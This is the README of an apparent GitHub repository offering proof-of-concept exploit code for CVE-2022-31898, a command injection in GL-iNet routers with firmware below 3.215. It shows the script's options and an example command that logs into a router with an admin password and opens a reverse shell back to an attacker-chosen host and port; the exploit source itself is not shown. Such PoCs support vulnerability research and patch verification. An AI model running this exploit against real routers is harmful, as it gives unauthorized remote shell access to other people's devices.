Skip to content

Exploit POC code for CVE-2022-31898, a command injection for GL-iNet routers with firmware below 3.215

License

Notifications You must be signed in to change notification settings

gigaryte/cve-2022-31898

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 

Repository files navigation

cve-2022-31898

Exploit POC code for CVE-2022-31898, a command injection for GL-iNet routers with firmware below 3.215

Usage

./cve-2022-31898.py -h
usage: cve-2022-31898.py [-h] -R RHOST [-P RPORT] -L LHOST [-l LPORT] [-p PWD] [-t]

options:
  -h, --help            show this help message and exit
  -R RHOST, --rhost RHOST
                        IP/hostname of Mango router
  -P RPORT, --rport RPORT
                        Port to connect to Mango router on
  -L LHOST, --lhost LHOST
                        Local host/IP for reverse shell to connect back to
  -l LPORT, --lport LPORT
                        Local port for reverse shell to connect back on
  -p PWD, --pwd PWD     Password to use to log in
  -t, --https           If set, use HTTPS

Example

Exploit GL-iNet router at 192.168.8.1 over HTTPS and connect back to local box at 192.168.8.123:8008 with admin password password:

./cve-2022-31898.py -R 192.168.8.1 -P 443 -L 192.168.8.123 -l 8008 -p password -t

About

Exploit POC code for CVE-2022-31898, a command injection for GL-iNet routers with firmware below 3.215

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages